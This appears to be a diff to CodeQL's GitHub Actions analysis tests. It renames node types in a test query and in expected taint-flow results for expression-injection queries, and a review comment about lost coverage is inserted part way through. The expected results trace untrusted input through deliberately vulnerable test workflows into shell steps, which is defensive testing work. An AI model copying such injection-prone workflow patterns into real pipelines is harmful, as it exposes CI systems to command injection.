as Cfg import codeql.actions.DataFlow 
@@ -15,29 +15,29 @@ query predicate stepNodes(Step s) { any() }
 query predicate allUsesNodes(Uses s) { any() }
-query predicate stepUsesNodes(StepUses s) { any() }
+query predicate stepUsesNodes(UsesStep s) { any() }
-query predicate jobUsesNodes(JobUses s) { any() }
+query predicate jobUsesNodes(UsesStep s) { any() }
 query predicate usesSteps(Uses call, string argname, Expression arg) {
- call.getArgumentExpr(argname) = arg
+ call.getArgument(argname) = arg
 }
-query predicate runSteps(Run run, string body) { run.getScript() = body }
+query predicate runSteps(Run run, string body) { run.getScript().getValue() = body }
 query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run }
 query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent }
-query predicate cfgNodes(Cfg::Node n) { n.getLocation().getFile().getBaseName() = "test.yml" } //any() }
+query predicate cfgNodes(Cfg::Node n) { any() }
-query predicate dfNodes(DataFlow::Node e) { e.getLocation().getFile().getBaseName() = "test.yml" } //any() }
+query predicate dfNodes(DataFlow::Node e) { any() }
 query predicate exprNodes(DataFlow::Node e) { any() }
 query predicate argumentNodes(DataFlow::ArgumentNode e) { any() }
-query predicate usesIds(StepUses s, string a) { s.getId() = a }
+query predicate usesIds(UsesStep s, string a) { s.getId() = a }
 query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l }
diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
index d31268b12b5..51fb9314685 100644
--- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected
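Review bot: In the `test.ql` hunk, `jobUsesNodes` is now typed `UsesStep`, exactly like `stepUsesNodes` just above it, so the two predicates will always return the same rows and nothing in this test pins job-level `uses:` calls (reusable workflow invocations) any more. The reusable-workflow expectations elsewhere in this patch suggest those calls are one of the paths the taint-tracking library follows, so a regression in how they are modelled could pass unnoticed here. If `Uses` still covers both levels after the refactor (not visible in this hunk), `query predicate jobUsesNodes(Uses s) { not s instanceof UsesStep }` would keep the coverage; otherwise drop the predicate rather than keep a duplicate.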
@@ -1,11 +1,11 @@ edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:12:35:51 | echo "H ... et }}." | -| action1/action.yml:24:7:31:4 | name: Remove foo [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | -| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | name: Remove foo [value] | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | +| action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | -| action1/action.yml:24:7:31:4 | name: Remove foo [value] | semmle.label | name: Remove foo [value] | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | | action1/action.yml:28:17:28:42 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | | action1/action.yml:32:12:32:50 | echo ${ ... alue }} | semmle.label | echo ${ ... alue }} | | action1/action.yml:35:12:35:51 | echo "H ... et }}." | semmle.label | echo "H ... et }}." | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 23369932e81..7bea4429e56 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected 
@@ -1,12 +1,12 @@ edges -| action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | -| action1/action.yml:44:7:48:70 | id: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | -| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | id: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | +| action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | nodes | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | semmle.label | ${{ ste ... inted}} | -| action1/action.yml:42:7:44:4 | id: changed-files | semmle.label | id: changed-files | -| action1/action.yml:44:7:48:70 | id: source [tainted] | semmle.label | id: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:18:48:69 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | subpaths #select -| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | id: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | +| action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:12:14:45 | ${{ ste ... inted}} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 8ec7f44dba3..6496731dd6b 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected 
+++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -1,11 +1,11 @@ edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | -| action1/action.yml:37:7:42:4 | id: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | -| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | id: reflector [reflected] | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | +| action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:11:12:11:51 | ${{ ste ... cted }} | semmle.label | ${{ ste ... cted }} | -| action1/action.yml:37:7:42:4 | id: reflector [reflected] | semmle.label | id: reflector [reflected] | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | | action1/action.yml:41:29:41:54 | ${{ inp ... reet }} | semmle.label | ${{ inp ... reet }} | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 8e19cd469ab..8d091b65547 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected 
@@ -1,12 +1,12 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | +| .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | nodes | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | semmle.label | ${{ job ... put2 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output2] | semmle.label | job-out ... utput}} [job-output2] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | | .github/workflows/reusable_workflow.yml:23:20:23:62 | ${{ ste ... files}} | semmle.label | ${{ ste ... files}} | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths #select -| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | name: G ... d files | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... 
put2 }} | Source | +| .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:16:13:51 | ${{ job ... put2 }} | Source | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index f7d715c9fa1..ae21052dcfe 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected 
@@ -1,15 +1,15 @@ edges | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | +| .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | semmle.label | ${{ job ... put1 }} | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | job-out ... utput}} [job-output1] | semmle.label | job-out ... 
utput}} [job-output1] | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | semmle.label | Job outputs node [job-output1] | | .github/workflows/reusable_workflow.yml:22:20:22:56 | ${{ ste ... utput}} | semmle.label | ${{ ste ... utput}} | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | | .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected index 55075b7baf3..dacd31cf91c 100644 --- a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected 
@@ -1,58 +1,58 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... 
ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | | .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... 
d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... 
iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... 
iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | -| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | -| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... 
test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes -| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | -| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | | .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... 
ody }}' | | .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | | .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | | .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | | .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | 
@@ -68,17 +68,17 @@ nodes | .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | semmle.label | Run Step: extract-url [initial_url] | | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | -| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... 
alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | -| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | @@ -89,9 +89,9 @@ nodes | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | | .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | | .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | 
